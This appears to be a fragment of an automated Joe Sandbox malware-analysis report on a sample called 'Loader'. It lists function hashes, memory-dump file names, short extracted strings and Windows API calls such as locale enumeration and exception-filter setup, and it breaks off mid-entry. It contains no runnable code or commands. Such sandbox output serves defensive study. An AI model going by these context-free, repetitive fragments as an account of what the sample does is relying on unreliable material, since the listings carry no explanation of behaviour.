                                                                                                                      • Opcode ID: bd5473dd6bda91648a11730aa12168d38c04bca27107d6d1bbc9fc31ebc23fac
                                                                                                                      • Instruction ID: 3f2d132bdcdee61c956a786d03f015c23d19414d728bd87b65ab30fb78692f47
                                                                                                                      • Opcode Fuzzy Hash: bd5473dd6bda91648a11730aa12168d38c04bca27107d6d1bbc9fc31ebc23fac
                                                                                                                      • Instruction Fuzzy Hash: F6C18875A0C3518FC718CF28C4907AABBE2ABD9314F148A6DF8D997391D734D909CB82
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • EnumSystemLocalesW.KERNEL32(001AC783,00000001,00000000,?,-00000050,?,001ACDB4,00000000,?,?,?,00000055,?), ref: 001AC6CF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2417226690-0
                                                                                                                      • Opcode ID: 967f63f9f168dc6327b21c252d1d1f4156a0456c80fae4a43c4c3acc86d084f4
                                                                                                                      • Instruction ID: 050323b2215b9c297f6c0b1411f57650ac635ff153219c69f85af4e47abdb74b
                                                                                                                      • Opcode Fuzzy Hash: 967f63f9f168dc6327b21c252d1d1f4156a0456c80fae4a43c4c3acc86d084f4
                                                                                                                      • Instruction Fuzzy Hash: 57110C3F6047059FDB18DF39C8916BAB792FF81358B15442CE54A87B40D771B942CB80
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001AC99F,00000000,00000000,?), ref: 001ACC31
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3736152602-0
                                                                                                                      • Opcode ID: 8d9218ef7d8072699ff8506a8844548048daff2505763a159d168b45176f22e8
                                                                                                                      • Instruction ID: 09dbb89aac85ddc2b382e49712b12c60a29ed2bb48658b2e9c765e5554e65526
                                                                                                                      • Opcode Fuzzy Hash: 8d9218ef7d8072699ff8506a8844548048daff2505763a159d168b45176f22e8
                                                                                                                      • Instruction Fuzzy Hash: CEF02D3A600211BBDB285B24CD457BA7768DB41B64F054424EC19A3144EB30FE41C6D0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • EnumSystemLocalesW.KERNEL32(001AC9D6,00000001,?,?,-00000050,?,001ACD78,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001AC742
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2417226690-0
                                                                                                                      • Opcode ID: 8a4a556c92e4ea471d5af895568dfa57020b605a0b01ace935b4724c44c751a6
                                                                                                                      • Instruction ID: 5a9d39866f879c14f9c37ff392989ce365e4f925609b9a710952bfb542de078a
                                                                                                                      • Opcode Fuzzy Hash: 8a4a556c92e4ea471d5af895568dfa57020b605a0b01ace935b4724c44c751a6
                                                                                                                      • Instruction Fuzzy Hash: A8F0F63E2003085FDB145F75DC81A7A7B91FF92368B05442DF9454B690D7B19C41CB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0019D4FD: EnterCriticalSection.KERNEL32(-00215168,?,001A0317,00000000,001BC430,0000000C,001A02DE,?,?,001A32F5,?,?,001A52E3,00000001,00000364,00000000), ref: 0019D50C
                                                                                                                      • EnumSystemLocalesW.KERNEL32(001A3359,00000001,001BC580,0000000C,001A370C,00000000), ref: 001A339E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1272433827-0
                                                                                                                      • Opcode ID: a544f36a0c03669a0747f0ac10c772e48fdba5a5133acdc4b3295d5107e7d2cb
                                                                                                                      • Instruction ID: f83ce380618eceae3826d4f9b5bd663d449051c528f89691952f91e2c8d5a76c
                                                                                                                      • Opcode Fuzzy Hash: a544f36a0c03669a0747f0ac10c772e48fdba5a5133acdc4b3295d5107e7d2cb
                                                                                                                      • Instruction Fuzzy Hash: 6FF03776A04214EFDB00EFA8E846B9D77B1FB59721F10855AF421DB2A0DBB559408B40
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • EnumSystemLocalesW.KERNEL32(001AC56B,00000001,?,?,?,001ACDD6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AC649
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2417226690-0
                                                                                                                      • Opcode ID: cb33a0bcad750bba7bcc095cf51beb39a9c4e4e9125ef41f7c996c43bb8327d7
                                                                                                                      • Instruction ID: 6435b29b8561be1134b397fc13bb2a49f6d56b0d89d73db63eda71c10833e244
                                                                                                                      • Opcode Fuzzy Hash: cb33a0bcad750bba7bcc095cf51beb39a9c4e4e9125ef41f7c996c43bb8327d7
                                                                                                                      • Instruction Fuzzy Hash: 1AF0A03A70020557CB04AF35DC4576A7FA5EF82B14B0A4059EA098B691C7719942C790
                                                                                                                      APIs
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001A2209,?,20001004,00000000,00000002,?,?,001A180B), ref: 001A3844
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2299586839-0
                                                                                                                      • Opcode ID: bbe27a708e376bc6dce23885bc738100ca1ae388a758a6ef299bdd7b41786f88
                                                                                                                      • Instruction ID: 0bd2178ebaab9b1a1235f222ef25ffc367bcead655868c9e25d644ffcda72e55
                                                                                                                      • Opcode Fuzzy Hash: bbe27a708e376bc6dce23885bc738100ca1ae388a758a6ef299bdd7b41786f88
                                                                                                                      • Instruction Fuzzy Hash: C7E04F3A500118BBCF122F60DC04B9E7E2AEF55761F004120FD2665221CB758F61AAD5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /.-,
                                                                                                                      • API String ID: 0-4180950418
                                                                                                                      • Opcode ID: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
                                                                                                                      • Instruction ID: dd1547553e5153afbf59257ea628d066a1642dd576ba0c4ad2a4c25b56b1e12a
                                                                                                                      • Opcode Fuzzy Hash: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
                                                                                                                      • Instruction Fuzzy Hash: D891A2716183228BC725DF18D48052FB7E2BF99750F15C92CEA95973A6DB31DC60CB81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /.-,
                                                                                                                      • API String ID: 0-4180950418
                                                                                                                      • Opcode ID: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
                                                                                                                      • Instruction ID: 73b837c6ea3f0e1f448c46277c4022797a415e02a546a617780ec385e574397b
                                                                                                                      • Opcode Fuzzy Hash: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
                                                                                                                      • Instruction Fuzzy Hash: F181A0746143029BD715EF18C890A2AB7E2FFD9750F15C92CE6858B3A6EB31ED21CB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,
                                                                                                                      • API String ID: 0-3772416878
                                                                                                                      • Opcode ID: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
                                                                                                                      • Instruction ID: d50bb0ef23ddf7e9cf513098bcd10d62dcd700d887b7c21fa258bf6151d0ab23
                                                                                                                      • Opcode Fuzzy Hash: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
                                                                                                                      • Instruction Fuzzy Hash: 85B127711093819FD325CF18C880A5BFBE0AFA9704F484A2DE5D997782D771E918CBA6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \fs>
                                                                                                                      • API String ID: 0-699854602
                                                                                                                      • Opcode ID: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
                                                                                                                      • Instruction ID: 27e7e31bf9de665bcdd8c7fa69003eba16e13d802475675d954927465126f96d
                                                                                                                      • Opcode Fuzzy Hash: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
                                                                                                                      • Instruction Fuzzy Hash: 8CB1F576519B808FC3268B38C4953E7BFE5AB66314F588D6EC4EF87386D638A604C711
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000076A1,00196991), ref: 0019769A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: bc35162432fef40433e6e0db73a27ebfd67fa2fa035d952996b0a2d06aa169f3
                                                                                                                      • Instruction ID: e7cc53efce2858d913812091a8b68980e7a3c5ae6720bd47fa2b23e4bf360b76
                                                                                                                      • Opcode Fuzzy Hash: bc35162432fef40433e6e0db73a27ebfd67fa2fa035d952996b0a2d06aa169f3
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EONQ
                                                                                                                      • API String ID: 0-2229190151
                                                                                                                      • Opcode ID: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
                                                                                                                      • Instruction ID: 64d5c5dfdb59e3b65faec7c7e82f7c645b057bbd944584cc4be3ec594d557df4
                                                                                                                      • Opcode Fuzzy Hash: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
                                                                                                                      • Instruction Fuzzy Hash: 37510832F412584BDB54CE78CCD23DEA7E29B99320F1945B9C88DE7341D9788D968B88
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Z81xbyuAua
                                                                                                                      • API String ID: 0-3121583705
                                                                                                                      • Opcode ID: ec99b9cc9169b3739fff7067996ac92d1708fd9168cb128a1770fc66bdb4b951
                                                                                                                      • Instruction ID: 05f0ba6268d540716cbc03bab4ac843c4089d7c81af3a7df2907d9ebab28558e
                                                                                                                      • Opcode Fuzzy Hash: ec99b9cc9169b3739fff7067996ac92d1708fd9168cb128a1770fc66bdb4b951
                                                                                                                      • Instruction Fuzzy Hash: 54411C76E2062B5BDF0CEEB8C8560AFBB65EB56310B044279ED11DB3D1E3348A45CAD0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*+(
                                                                                                                      • API String ID: 0-3233224373
                                                                                                                      • Opcode ID: 7e992bcb0419394c7b56ce8b9b6dc6be5684b2f0c769e16de6df5883eacfe6c2
                                                                                                                      • Instruction ID: 581284c9781403d4cc2c1ae5aae029c2bcd6e1bdbb9e6b9d46b433673a705b40
                                                                                                                      • Opcode Fuzzy Hash: 7e992bcb0419394c7b56ce8b9b6dc6be5684b2f0c769e16de6df5883eacfe6c2
                                                                                                                      • Instruction Fuzzy Hash: AD4102705183029BDB1C8F18949067FB7B2FF86B51F205E1DE0825B296D731DA02CBC9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: SPQV
                                                                                                                      • API String ID: 0-3051931956
                                                                                                                      • Opcode ID: 573b9eb2576cc5e10adbf4a37c6f1793a70a231155131bc283978463e67e9f7b
                                                                                                                      • Instruction ID: df63e545a47715d3ca2512bf8f6f0d10710b3c809383f16ea3677c769c480755
                                                                                                                      • Opcode Fuzzy Hash: 573b9eb2576cc5e10adbf4a37c6f1793a70a231155131bc283978463e67e9f7b
                                                                                                                      • Instruction Fuzzy Hash: 9731CB205083508BE7016B78945A7ABBFE1EFA2328F149D6CE9C1D72D2DB78C8468757
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +
                                                                                                                      • API String ID: 0-2126386893
                                                                                                                      • Opcode ID: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
                                                                                                                      • Instruction ID: cd474249f81f048fed3b30be75adb9c3bd61160e910edcf86a85fcb528a8e4c2
                                                                                                                      • Opcode Fuzzy Hash: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
